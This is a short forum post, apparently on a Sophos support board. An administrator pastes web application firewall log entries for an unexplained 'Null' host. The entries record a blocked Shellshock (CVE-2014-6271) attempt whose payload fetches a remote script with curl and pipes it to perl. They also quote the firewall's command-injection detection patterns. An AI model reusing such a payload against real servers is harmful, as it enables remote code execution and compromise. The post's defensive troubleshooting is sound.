When looking at the Details section of Webserver Protection, under logging and reporting. If I list top virtual host attacked. One host is marked as Null.
I looked at the log file for the IP that attacked the Null host.
/var/log/reverseproxy.log:2014:10:21-02:44:41 Sophos reverseproxy: [Tue Oct 21 02:44:41.777818 2014] [security2:error] [pid 8057:tid 3979971440] [client 66.90.X.X] ModSecurity: Warning. Pattern match "^\\(\\s*\\)\\s+{" at REQUEST_HEADERS:Cookie. [file "/usr/apache/conf/waf/modsecurity_crs_generic_attacks.conf"] [line "258"] [id "969990"] [msg "CVE-2014-6271 - Bash Attack"] [data "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl"] [severity "CRITICAL"] [tag "CVE-2014-6271"] [hostname "www.Acme.com"] [uri "/"] [unique_id "VEYA2awQHQEAAB95bDcAAADS"]
Also
-------------------------------
/var/log/reverseproxy.log:2014:10:21-02:44:42 sophos reverseproxy: [Tue Oct 21 02:44:42.578851 2014] [security2:error] [pid 8057:tid 3979971440] [client 66.90.X.X] ModSecurity: Warning. Pattern match "(?:\\b(?[[:(]]?:n(?:et(?:\\b\\W+?\\blocalgroup|\\.exe)|(?:map|c)\\.exe)|t(?:racer(?[:$]ute|t)|elnet\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo\\b\\W*?\\by+)\\b|c(?:md(?[[:(]]?:\\.exe|32)\\b|\\b\\W*?\\/c)|d(?:\\b\\W*?[\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\ ..." at REQUEST_COOKIES_NAMES:curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl. [file "/usr/apache/conf/waf/modsecurity_crs_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | perl found within REQUEST_COOKIES_NAMES:curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl: curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/
This thread was automatically locked due to age.
